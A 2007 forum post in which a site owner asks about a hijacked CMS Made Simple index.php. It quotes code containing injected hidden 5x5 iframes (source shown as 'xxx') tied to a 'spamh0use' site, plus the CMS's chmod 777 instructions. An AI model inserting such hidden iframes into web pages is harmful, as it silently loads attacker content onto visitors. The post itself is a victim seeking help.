Hijacked index.php? What is spamh0use?
Posted: Sat Mar 31, 2007 5:10 pm
Last night I tried to access a CMSMS site that I have been occasionally working on since the middle of last year, but received an error message ('missing ';' or something on line 60ish). The site worked fine as of the end of February, but I have not accessed it since so I'm not sure when or how this happened. When I opened up the index.php file to view the source, I noticed this code around line 60:
ny ideas on how this might have happened or what that spamh0use site it tries to load is all about? For the record, I accidentally did leave the "install" folder on the server, could that be how it was hacked? I replaced the index.php with an original copy and it worked fine.
Code: Select all
if (!file_exists(CONFIG_FILE_LOCATION) || filesize(CONFIG_FILE_LOCATION) < 800)
{
require_once($dirname.'/lib/misc.functions.php');
if (FALSE == is_file($dirname.'/install/install.php')) {
die ('There is no config.php file or install/install.php please correct one these errors!');
} else {
redirect('install/install.php');
}
}
else if (file_exists(TMP_CACHE_LOCATION.'/SITEDOWN'))
{
echo "<__html><head><title>Maintenance</title></head><__iframe name='StatPage' src='xxx' width=5 height=5 style='display:none'></__iframe></__body><p>Site down for maintenance.</p><__body></__html>";
exit;
}
if (!is_writable(TMP_TEMPLATES_C_LOCATION) || !is_writable(TMP_CACHE_LOCATION))
{
echo '<__html><title>Error</title></head><__iframe name='StatPage' src='xxx' width=5 height=5 style='display:none'></__iframe></__body>';
echo '<p>The following directories must be writable by the web server:<br />';
echo 'tmp/cache<br />';
echo 'tmp/templates_c<br /></p>';
echo '<p>Please correct by executing:<br /><em>chmod 777 tmp/cache<br />chmod 777 tmp/templates_c</em><br />or the equivilent for your platform before continuing.</p>';
echo '<__body></__html>';
exit;
}